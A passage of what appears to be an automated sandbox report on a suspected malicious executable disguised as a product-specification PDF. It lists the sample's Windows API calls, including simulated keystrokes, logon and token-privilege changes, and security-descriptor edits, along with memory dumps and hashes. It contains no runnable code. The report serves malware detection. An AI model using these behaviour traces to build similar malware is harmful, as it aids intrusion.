                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 744eb30c93d5da545865f4e35d0b87b410ab508eea6de5eff6c5534c9baf641d
                                                                                                                • Instruction ID: 1d0762e5e1f211919c7bbdba259bab19fe090961cad148276692dbf0313d4bd8
                                                                                                                • Opcode Fuzzy Hash: 744eb30c93d5da545865f4e35d0b87b410ab508eea6de5eff6c5534c9baf641d
                                                                                                                • Instruction Fuzzy Hash: 05D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014100BE1856020C732E822EB90
                                                                                                                Function 00A41CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00A41CBC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3098949447-0
                                                                                                                • Opcode ID: f0f7b76d32a347bf6228becfc6cf2035a05eede5e1a7fe72d69881ae6af6d3df
                                                                                                                • Instruction ID: 8dce4394da8d157c3569b96d48474fac855ac98d6f04010f477e8625038c305c
                                                                                                                • Opcode Fuzzy Hash: f0f7b76d32a347bf6228becfc6cf2035a05eede5e1a7fe72d69881ae6af6d3df
                                                                                                                • Instruction Fuzzy Hash: 52C09B352C0305AFF61487C4BC4BF507755E358B10F84C501F709565E7C7A11420D654
                                                                                                                Function 00AB744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A45745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00A4949C,?,00008000), ref: 00A45773
                                                                                                                • GetLastError.KERNEL32(00000002,00000000), ref: 00AB76DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorFileLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1214770103-0
                                                                                                                • Opcode ID: be8faba01aad26d2fb6aee22e1551a23411928d067ca835f5bf3ac72d1f9920a
                                                                                                                • Instruction ID: 8c1d861e347eac9646440ec97c00141563ad59a77fe710df13a4f54e75d0b379
                                                                                                                • Opcode Fuzzy Hash: be8faba01aad26d2fb6aee22e1551a23411928d067ca835f5bf3ac72d1f9920a
                                                                                                                • Instruction Fuzzy Hash: 6E819D346087019FC714EF28C5A1BAEB7E5BFC9310F04451DF88A5B2A2DB70AD45CB92
                                                                                                                Function 00A46246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNELBASE(?,?,00000000,00A824E0), ref: 00A46266
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: 3199c2ebbaec454938d6bc50d1a5d22e36e7d4a4be4997e810dd8159ae662fa4
                                                                                                                • Instruction ID: 7068c8b8afcbecab3d6c1d6f6dadab9849c6637cf5b01df962f1d6950fd65807
                                                                                                                • Opcode Fuzzy Hash: 3199c2ebbaec454938d6bc50d1a5d22e36e7d4a4be4997e810dd8159ae662fa4
                                                                                                                • Instruction Fuzzy Hash: 65E09279800B01DEC3318F1AE804552FBF5FEE23613204A2ED0E692660D3B058868B51
                                                                                                                Function 0141DF80 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0141DF91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342040529.000000000141B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0141B000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_141b000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Sleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 3472027048-0
                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction ID: b6c4336509d3a6a1fe5e2c5907a60f0ce01ee6ef0cfc0b8d6ad44aaa217c91de
                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                • Instruction Fuzzy Hash: AEE0BF7494410D9FDB00EFA4D6496AE7BB4EF04301F100161FD0592281D6309A608A62

                                                                                                                Non-executed Functions

                                                                                                                Function 00AD9576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00AD961A
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AD965B
                                                                                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00AD969F
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AD96C9
                                                                                                                • SendMessageW.USER32 ref: 00AD96F2
                                                                                                                • GetKeyState.USER32(00000011), ref: 00AD978B
                                                                                                                • GetKeyState.USER32(00000009), ref: 00AD9798
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00AD97AE
                                                                                                                • GetKeyState.USER32(00000010), ref: 00AD97B8
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AD97E9
                                                                                                                • SendMessageW.USER32 ref: 00AD9810
                                                                                                                • SendMessageW.USER32(?,00001030,?,00AD7E95), ref: 00AD9918
                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00AD992E
                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AD9941
                                                                                                                • SetCapture.USER32(?), ref: 00AD994A
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AD99AF
                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AD99BC
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00AD99D6
                                                                                                                • ReleaseCapture.USER32 ref: 00AD99E1
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD9A19
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AD9A26
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AD9A80
                                                                                                                • SendMessageW.USER32 ref: 00AD9AAE
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AD9AEB
                                                                                                                • SendMessageW.USER32 ref: 00AD9B1A
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AD9B3B
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AD9B4A
                                                                                                                • GetCursorPos.USER32(?), ref: 00AD9B68
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00AD9B75
                                                                                                                • GetParent.USER32(?), ref: 00AD9B93
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AD9BFA
                                                                                                                • SendMessageW.USER32 ref: 00AD9C2B
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AD9C84
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AD9CB4
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AD9CDE
                                                                                                                • SendMessageW.USER32 ref: 00AD9D01
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00AD9D4E
                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AD9D82
                                                                                                                  • Part of subcall function 00A59944: GetWindowLongW.USER32(?,000000EB), ref: 00A59952
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD9E05
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                • API String ID: 3429851547-4164748364
                                                                                                                • Opcode ID: 243f4c5c6c063bd1e66270fd6b7497ddbd4f1f75b340c9199bed9cc3cf02bb51
                                                                                                                • Instruction ID: 5cf36ace94885f4efd1484955c324f54422805139bb93aaf46d5f63459b31bc4
                                                                                                                • Opcode Fuzzy Hash: 243f4c5c6c063bd1e66270fd6b7497ddbd4f1f75b340c9199bed9cc3cf02bb51
                                                                                                                • Instruction Fuzzy Hash: 08429C34205201AFDB24CF68CC44AABBBF5FF49360F144A1AF69A973A1DB31E851CB51
                                                                                                                Function 00AD4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00AD48F3
                                                                                                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00AD4908
                                                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00AD4927
                                                                                                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00AD494B
                                                                                                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00AD495C
                                                                                                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00AD497B
                                                                                                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00AD49AE
                                                                                                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00AD49D4
                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00AD4A0F
                                                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00AD4A56
                                                                                                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00AD4A7E
                                                                                                                • IsMenu.USER32(?), ref: 00AD4A97
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AD4AF2
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AD4B20
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AD4B94
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00AD4BE3
                                                                                                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00AD4C82
                                                                                                                • wsprintfW.USER32 ref: 00AD4CAE
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AD4CC9
                                                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00AD4CF1
                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00AD4D13
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AD4D33
                                                                                                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 00AD4D5A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 4054740463-328681919
                                                                                                                • Opcode ID: d0c75173acc70307c790effa008a1f8ca3fac9316b4370ed0a1ef5c76a96600d
                                                                                                                • Instruction ID: c4e1f26fa5c9058bf33355f0265ed14d2a133cac0d932591d9c50f4f2c38effc
                                                                                                                • Opcode Fuzzy Hash: d0c75173acc70307c790effa008a1f8ca3fac9316b4370ed0a1ef5c76a96600d
                                                                                                                • Instruction Fuzzy Hash: 6D12DE71600255ABEB258F68CC49FAE7BF8EF49710F10412AF917EB2E1DB789941CB50
                                                                                                                Function 00A5F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00A5F998
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9F474
                                                                                                                • IsIconic.USER32(00000000), ref: 00A9F47D
                                                                                                                • ShowWindow.USER32(00000000,00000009), ref: 00A9F48A
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A9F494
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A9F4AA
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00A9F4B1
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A9F4BD
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9F4CE
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A9F4D6
                                                                                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00A9F4DE
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A9F4E1
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F4F6
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A9F501
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F50B
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A9F510
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F519
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A9F51E
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A9F528
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00A9F52D
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A9F530
                                                                                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00A9F557
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 4125248594-2988720461
                                                                                                                • Opcode ID: 3bb0c2e90ca243897c621e772d3c22d01d8970f4c612e77035c2ca8a829a2fe5
                                                                                                                • Instruction ID: 140283d7f91289994da81f05f1258c80fdaf3e0930b3c0a5b778182e0b3c43a0
                                                                                                                • Opcode Fuzzy Hash: 3bb0c2e90ca243897c621e772d3c22d01d8970f4c612e77035c2ca8a829a2fe5
                                                                                                                • Instruction Fuzzy Hash: 90314171B81219BEEF206BE55C49FBF7FACEB44B60F510066FA01E61D1C6B05901EA60
                                                                                                                Function 00AA1201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AA170D
                                                                                                                  • Part of subcall function 00AA16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AA173A
                                                                                                                  • Part of subcall function 00AA16C3: GetLastError.KERNEL32 ref: 00AA174A
                                                                                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00AA1286
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00AA12A8
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AA12B9
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00AA12D1
                                                                                                                • GetProcessWindowStation.USER32 ref: 00AA12EA
                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 00AA12F4
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00AA1310
                                                                                                                  • Part of subcall function 00AA10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AA11FC), ref: 00AA10D4
                                                                                                                  • Part of subcall function 00AA10BF: CloseHandle.KERNEL32(?,?,00AA11FC), ref: 00AA10E9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 22674027-1027155976
                                                                                                                • Opcode ID: f3b5faf03bfd7751b3f8c3eb0727611bc51782c4725698d57e77d82809f0e39a
                                                                                                                • Instruction ID: 39df0518a39c854d5e1cb360e3d83456ea7f7414dbbedffd9305f48669a92f18
                                                                                                                • Opcode Fuzzy Hash: f3b5faf03bfd7751b3f8c3eb0727611bc51782c4725698d57e77d82809f0e39a
                                                                                                                • Instruction Fuzzy Hash: B9816AB1A00209BBDF21DFA8DD49BEE7BB9EF09714F14412AF912A71A0D7358945CB20
                                                                                                                Function 00AA0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AA1114
                                                                                                                  • Part of subcall function 00AA10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1120
                                                                                                                  • Part of subcall function 00AA10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA112F
                                                                                                                  • Part of subcall function 00AA10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1136
                                                                                                                  • Part of subcall function 00AA10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AA114D
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AA0BCC
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AA0C00
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00AA0C17
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00AA0C51
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AA0C6D
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00AA0C84
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AA0C8C
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00AA0C93
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AA0CB4
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00AA0CBB
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AA0CEA
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AA0D0C
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AA0D1E
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0D45
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0D4C
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0D55
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0D5C
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0D65
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0D6C
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00AA0D78
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0D7F
                                                                                                                  • Part of subcall function 00AA1193: GetProcessHeap.KERNEL32(00000008,00AA0BB1,?,00000000,?,00AA0BB1,?), ref: 00AA11A1
                                                                                                                  • Part of subcall function 00AA1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AA0BB1,?), ref: 00AA11A8
                                                                                                                  • Part of subcall function 00AA1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AA0BB1,?), ref: 00AA11B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 4175595110-0
                                                                                                                • Opcode ID: 72917a0f6bd7577d0cefefd1ade8e95c107fc4133920e6f708bb5073a424dcf2
                                                                                                                • Instruction ID: 644c621f51f832a1f3133e8d04648fb2f4b22620804c7970bc8dd871abdfbfe9
                                                                                                                • Opcode Fuzzy Hash: 72917a0f6bd7577d0cefefd1ade8e95c107fc4133920e6f708bb5073a424dcf2
                                                                                                                • Instruction Fuzzy Hash: 28715B7290121AABDF10DFE4DC44FAEBBB8BF05320F144619F915A7291D775AA06CBA0
                                                                                                                Function 00ABEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
